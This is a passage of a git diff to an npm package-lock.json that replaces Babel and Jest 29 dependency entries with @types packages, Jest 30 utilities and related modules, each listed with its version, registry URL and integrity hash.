>=24.0.0" } }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "node_modules/@types/jest/node_modules/jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", + "node_modules/@types/jest/node_modules/picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.19.0" - }, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=12" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", + "node_modules/@types/jest/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } + "node_modules/@types/js-yaml": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", + "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" + }, + "node_modules/@types/lodash": { + "version": "4.14.172", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", + "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", + "dev": true }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", + "node_modules/@types/lodash-es": { + "version": "4.17.12", + "resolved": "https://registry.npmjs.org/@types/lodash-es/-/lodash-es-4.17.12.tgz", + "integrity": "sha512-0NgftHUcV4v34VhXm8QBSftKVXtbkBG3ViCjs6+eJ5a6y6Mi/jiFGPc1sC7QK+9BFhWrURE3EOggmWaSxL9OzQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" + "@types/lodash": "*" } }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "node_modules/@types/mustache": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", + "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", "dev": true }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", + "node_modules/@types/node": { + "version": "22.16.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.2.tgz", + "integrity": "sha512-Cdqa/eJTvt4fC4wmq1Mcc0CPUjp/Qy2FGqLza3z3pKymsI969TcZ54diNJv8UYUgeWxyb8FSbCkhdR6WqmUFhA==", "dev": true, + "license": "MIT", "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" + "undici-types": "~6.21.0" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "dev": true, + "license": "MIT", "dependencies": { - "sprintf-js": "~1.0.2" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "node_modules/@types/nodemailer": { + "version": "6.4.4", + "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", + "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", "dev": true, "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" + "@types/node": "*" } }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "node_modules/@types/nunjucks": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", + "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", + "dev": true + }, + "node_modules/@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true, - "engines": { - "node": ">=8" - } + "license": "MIT" }, - "node_modules/@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "@types/node": "*" } }, - "node_modules/@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", + "node_modules/@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, + "@types/yargs-parser": "*" + } + }, + "node_modules/@types/yargs-parser": { + "version": "20.2.1", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", + "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", + "dev": true + }, + "node_modules/a-sync-waterfall": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", + "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" + }, + "node_modules/agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", + "dev": true, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } + "node": ">= 14" } }, - "node_modules/@jest/core/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" + "color-convert": "^2.0.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@jest/core/node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + }, + "node_modules/asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", "dev": true }, - "node_modules/@jest/core/node_modules/jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", "dev": true, + "license": "Apache-2.0" + }, + "node_modules/bare-events": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.6.0.tgz", + "integrity": "sha512-EKZ5BTXYExaNqi3I3f9RtEsaI/xBSGjE0XZCZilPzFAV/goswFHuPd9jEZlPIZ/iNZJwDSao9qRiScySz7MbQg==", + "dev": true, + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", + "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "bare": ">=1.16.0" }, - "optionalDependencies": { - "fsevents": "^2.3.2" + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/@jest/core/node_modules/jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", "dev": true, + "license": "Apache-2.0", + "optional": true, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "bare": ">=1.14.0" } }, - "node_modules/@jest/core/node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "bare-os": "^3.0.1" } }, - "node_modules/@jest/core/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", "dev": true, + "license": "Apache-2.0", + "optional": true, "dependencies": { - "has-flag": "^4.0.0" + "streamx": "^2.21.0" }, - "engines": { - "node": ">=10" + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/@jest/core/node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" + "fill-range": "^7.1.1" }, "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.4" } }, - "node_modules/@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "dependencies": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" } }, - "node_modules/@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dev": true, "dependencies": { - "jest-get-type": "^29.2.0" + "color-name": "~1.1.4" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=7.0.0" } }, - "node_modules/@jest/expect-utils/node_modules/jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true }, - "node_modules/@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dev": true, "dependencies": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" + "delayed-stream": "~1.0.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 0.8" } }, - "node_modules/@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - }, + "node_modules/commander": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", + "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">= 6" } }, - "node_modules/@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", "dev": true, + "license": "MIT", "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" + "ms": "^2.1.3" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "node": ">=6.0" }, "peerDependenciesMeta": { - "node-notifier": { + "supports-color": { "optional": true } } }, - "node_modules/@jest/reporters/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", 